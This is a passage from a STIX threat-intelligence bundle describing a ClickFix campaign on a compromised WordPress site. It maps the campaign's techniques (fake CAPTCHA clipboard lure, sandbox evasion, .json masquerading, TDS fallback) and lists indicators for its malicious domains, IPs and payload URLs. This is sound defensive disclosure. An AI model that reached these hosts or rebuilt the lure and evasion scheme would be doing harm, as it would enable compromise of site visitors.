          "url": "https://attack.mitre.org/techniques/T1027/010",
          "external_id": "T1027.010"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--918c612f-57dd-4882-ae11-7c96eaf3a6fd",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1036.005 \u2014 Masquerading: Match Legitimate Name or Location",
      "description": "V4-specific: both files in the bundle use the .json extension (stuff3.json, stuff3b.json) to masquerade as data/config files rather than executable JavaScript; only stuff3b.json is malicious, stuff3.json being the legitimate cover file. Evades WAF rules targeting .js extensions and JS content-type inspection.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1036/005",
          "external_id": "T1036.005"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--1ed9c8ee-4be8-4196-ba0e-65b49da81a14",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1036 \u2014 Masquerading: Legitimate Tool Bundling",
      "description": "Legitimate Cloudflare RUM beacon script (stuff3.json) bundled alongside the malicious payload as a legitimacy prop. Analysts seeing Cloudflare analytics traffic are less likely to flag the bundle.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1036",
          "external_id": "T1036"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e8bd5fe3-e15f-4b32-9620-058938616094",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1497.001 \u2014 Virtualization/Sandbox Evasion: System Checks",
      "description": "setInterval(trap, 4000) + Function.constructor('return this') sandbox escape. Anti-debug IIFE at line 306, once-wrapper factory at line 379. Identical pattern to V3.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1497/001",
          "external_id": "T1497.001"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--21da9b60-9393-47fa-9163-d82e14bf4439",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1189 \u2014 Drive-by Compromise",
      "description": "Injected into the4ssst.ca WordPress dispensary site. Earliest confirmed victim site in the cluster \u2014 March 20, 2026.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1189",
          "external_id": "T1189"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e88d64db-0290-4273-82a2-2a7071da66b5",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1203 \u2014 Exploitation for Client Execution",
      "description": "Shadow DOM fake Cloudflare CAPTCHA overlay. clipboard.writeText(PowerShell_payload). 50-language locale-aware lure text. 30-second auto-dismiss.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1203",
          "external_id": "T1203"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6474ec87-07d3-4b3b-ae22-79939ff853c0",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1185 \u2014 Browser Session Hijacking / Victim Tracking",
      "description": "localStorage key + document.cookie set after overlay display. Prevents repeat lure display \u2014 victim state persisted across sessions.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1185",
          "external_id": "T1185"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--abc48e17-1429-421a-943d-bc93b63c8a15",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1566.002 \u2014 Phishing: Spearphishing Link",
      "description": "Victims arrive at the compromised dispensary site organically or via referral.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1566/002",
          "external_id": "T1566.002"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--b7c4341a-1acb-4a18-a15a-2708ed6c9cc6",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1140 \u2014 Deobfuscate/Decode Files or Information",
      "description": "RC4+Base64 decoding at runtime. atob() calls for TDS URLs within decoded strings.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1140",
          "external_id": "T1140"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--930617e7-b93b-40b3-9f41-5b91a1756916",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1104 \u2014 Multi-Stage Channels",
      "description": "TDS fallback chain (ntdnewtds.shop \u2192 dnsnewtds.shop + third) via /jsrepo?rnd= endpoint.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1104",
          "external_id": "T1104"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c08a9c70-8acd-4f92-9df6-7ff94c92f78c",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1608.002 \u2014 Stage Capabilities: Upload Tool",
      "description": "Remote second-stage JS payload hosted at TDS /jsrepo endpoint.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1608/002",
          "external_id": "T1608.002"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3382650e-6541-4a12-84a7-51eec676dd93",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ce313ffe-8117-47c9-a448-5044c480ab17",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "malware--3f399c83-6acb-45da-b156-cfb1720fa906",
      "description": "CF RUM script bundled as legitimacy cover"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7f0d619c-2eb4-481c-b7b0-ab3eb297f84e",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "infrastructure--b2dfe587-9e56-4725-8a91-1016bacf5d61"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0a302975-2cbe-4422-af79-7f743f14e35d",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "infrastructure--ed963832-b888-4739-bea7-9a78eb5364e8"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1ac09a93-904a-4b03-8717-40f109b89805",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "infrastructure--4981b3b3-d2e2-4d1c-a4a2-8e691dfe2be9",
      "description": "the4ssst.ca compromised as malware host"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e7be473c-842b-4ba1-b78a-572c9b5fa2ef",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5",
      "target_ref": "infrastructure--b2dfe587-9e56-4725-8a91-1016bacf5d61"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cad100a8-09f3-4ce6-b8b0-d1c083dc160f",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5",
      "target_ref": "infrastructure--ed963832-b888-4739-bea7-9a78eb5364e8"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--88d0a149-46f8-4b10-8186-378cac4bc920",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "hosted-on",
      "source_ref": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5",
      "target_ref": "infrastructure--4981b3b3-d2e2-4d1c-a4a2-8e691dfe2be9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9bcb8b92-41a3-4049-8e1b-e469cb2e9086",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "hosted-on",
      "source_ref": "malware--3f399c83-6acb-45da-b156-cfb1720fa906",
      "target_ref": "infrastructure--4981b3b3-d2e2-4d1c-a4a2-8e691dfe2be9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0646549b-309b-4a41-bb3b-317d41e36f64",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--48805e62-ccb9-4904-accf-24ff35396e71",
      "target_ref": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c36f7ea3-ff2d-4cf2-82e5-b2daa06d201d",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--e14416aa-6d76-4d6c-a891-766c882e8dc9",
      "target_ref": "malware--3f399c83-6acb-45da-b156-cfb1720fa906"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--88acba85-0cb8-497b-8935-13ee40866249",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--8cfcf337-0d4c-4f96-ba49-67a7255c1294",
      "target_ref": "infrastructure--b2dfe587-9e56-4725-8a91-1016bacf5d61"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--28bd48c7-03c7-44cb-b228-bed295b79d30",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--161124c4-d98f-42d0-87db-b16857807b07",
      "target_ref": "infrastructure--ed963832-b888-4739-bea7-9a78eb5364e8"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--892f7e88-960a-4f67-96ec-99e4cc3e3d5c",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--a4c64c4e-f824-49c4-920c-29a642e7456b",
      "target_ref": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--64ad6ba9-c72b-4e9a-9f86-5e43150a465c",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--f2efd379-27b0-493f-a58e-3587e75ee694",
      "target_ref": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7d460bb9-8b8c-4a42-a8af-f6bbeee8aba2",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--f9918948-fad5-4b36-8466-d1a7002c5a63",
      "target_ref": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--278660f1-456e-45cd-a180-967835e164ca",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "attributed-to",
      "source_ref": "campaign--8ff91c87-e1b7-49fe-823f-c9b6108cd46f",
      "target_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b9b9c6f4-40ce-49b0-8a30-44bede321c6e",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--9c21e0c6-4300-4fa0-85cf-617f887f4608"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b5e27903-d8e4-4684-a4f6-3e47d42e75b2",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--09d6b4b8-1ab2-4514-bf39-c2c69277b243"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b2a8ab01-10d1-4322-850a-0e6177314f2b",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--d052c8f6-7ff8-4887-beda-6034b4981333"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--30a6d4d6-59c9-4d77-a77c-d99511eb4499",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--918c612f-57dd-4882-ae11-7c96eaf3a6fd"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ee56737f-461e-47ae-9466-371bd0e67b19",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--1ed9c8ee-4be8-4196-ba0e-65b49da81a14"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--97fe1a23-99dd-4d05-bfff-f8d5238c06a7",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--e8bd5fe3-e15f-4b32-9620-058938616094"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a6338304-56cc-4490-8ab7-0752024c900c",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--21da9b60-9393-47fa-9163-d82e14bf4439"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5f81764c-8f2f-4b7f-8341-f896f95382ee",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--e88d64db-0290-4273-82a2-2a7071da66b5"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f52a311d-0f93-4ef5-9060-bc4a9906b107",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--6474ec87-07d3-4b3b-ae22-79939ff853c0"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--202d585e-a4a4-4be3-b498-775fd19b6e09",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--abc48e17-1429-421a-943d-bc93b63c8a15"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--012916d0-5240-4f5a-88fd-a31ca1f2ee65",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--b7c4341a-1acb-4a18-a15a-2708ed6c9cc6"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0ced4d36-bfe3-499f-9ee2-6d69de076684",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--930617e7-b93b-40b3-9f41-5b91a1756916"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--38ff43a4-555d-46d5-837b-71e4c3c11436",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "target_ref": "attack-pattern--c08a9c70-8acd-4f92-9df6-7ff94c92f78c"
    },
    {
      "contact_information": "https://otx.alienvault.com/",
      "created": "2026-05-13T05:02:56.872Z",
      "id": "identity--ab072f15-9b87-4ee1-898f-b584d41f29b0",
      "identity_class": "organization",
      "modified": "2026-05-13T05:02:56.872Z",
      "name": "Open Threat Exchange",
      "spec_version": "2.1",
      "type": "identity"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": " / CC=GB ASN=AS786 jisc services limited",
      "id": "indicator--7a6e762c-ff00-49fb-a0a1-96bed10f5aeb",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[ipv4-addr:value = '158.94.208.104']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z",
      "valid_until": "2026-06-17T18:00:00.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": " / CC=GB ASN=AS786 jisc services limited",
      "id": "indicator--baa6c03b-2691-4b4e-a50d-58043e899dc2",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[ipv4-addr:value = '158.94.208.92']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z",
      "valid_until": "2026-06-12T04:00:00.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": " / CC=DE ASN=AS40999 dus.net gmbh",
      "id": "indicator--9f4acaf5-9693-4c51-8119-d47baf0b6c32",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[ipv4-addr:value = '178.16.52.232']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z",
      "valid_until": "2026-06-12T04:00:00.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--64cc5109-3562-45d1-9ae6-269039741ad5",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://158.94.208.92']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--d9281b63-9ba7-4b95-b5df-ffa71b7a1e1a",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://ntdnewtds.shop/jsrepo?rnd=']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--e6e0adc8-5b21-43a2-aa06-44350e3f386f",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'dnsnewtds.shop']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--cd1d795d-6461-42a4-9802-4c5607715627",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'gettrumpmemestrendingtokens.com']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--58d34e92-e413-49b9-8eff-08a46e19d29a",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'ntdnewtds.shop']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--efe5baa8-f3a7-420b-8d5a-b1182040edc6",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://www.dnsnewtds.shop/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--351160e9-d1b4-4889-9a4c-6ef23c6c5f16",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://dnsnewtds.shop/...']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--3e8a2307-6039-46d8-8968-7b6f52d4b1af",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://www.dnsnewtds.shop/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--a28f857a-19f2-4e91-9c1b-d46ec22c2c29",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'caravan-crm-lu.com']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--6095338f-01c5-4869-9d7f-628d3b00c1c3",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'blksssd.ydns.eu']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--6335212e-8524-4651-a211-68f17c971c20",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'kamisisterbrofanydodf.com']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--b504534a-e6f1-42ba-baea-1d23eb8a8eb8",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://158.94.208.104/x7GkP2mQ9zL4/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--ef4afaf6-6c4a-42f5-9fc4-384928a06ec1",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://158.94.208.104/x7GkP2mQ9zL4/my_downloader.bin']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--f701673e-8308-4c25-92e6-ec556ab22767",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://158.94.208.104/x7GkP2mQ9zL4/my_l.bin']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--397eef52-ba80-4efc-bf14-d60b925d83ea",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://158.94.208.104/x7GkP2mQ9zL4/my_s.bin']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--f9fef7c7-6cb1-41ae-9421-b0e11a12b9e0",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://158.94.208.104/x7GkP2mQ9zL4/student_downloader.bin']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "",
      "id": "indicator--76dbc9f2-f941-487a-813c-dda23d440357",
      "labels": [
        "phishing"
      ],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://158.94.208.104/x7GkP2mQ9zL4/student_l.bin']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "C2 Server / OMEGATECH / Secondary payload",
      "id": "indicator--8b5c28ad-7556-4990-a294-dbd4e583979b",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://158.94.208.104/x7GkP2mQ9zL4/student_s.bin']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--2fa2a651-65cd-42b6-82e2-8fe0560b876f",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
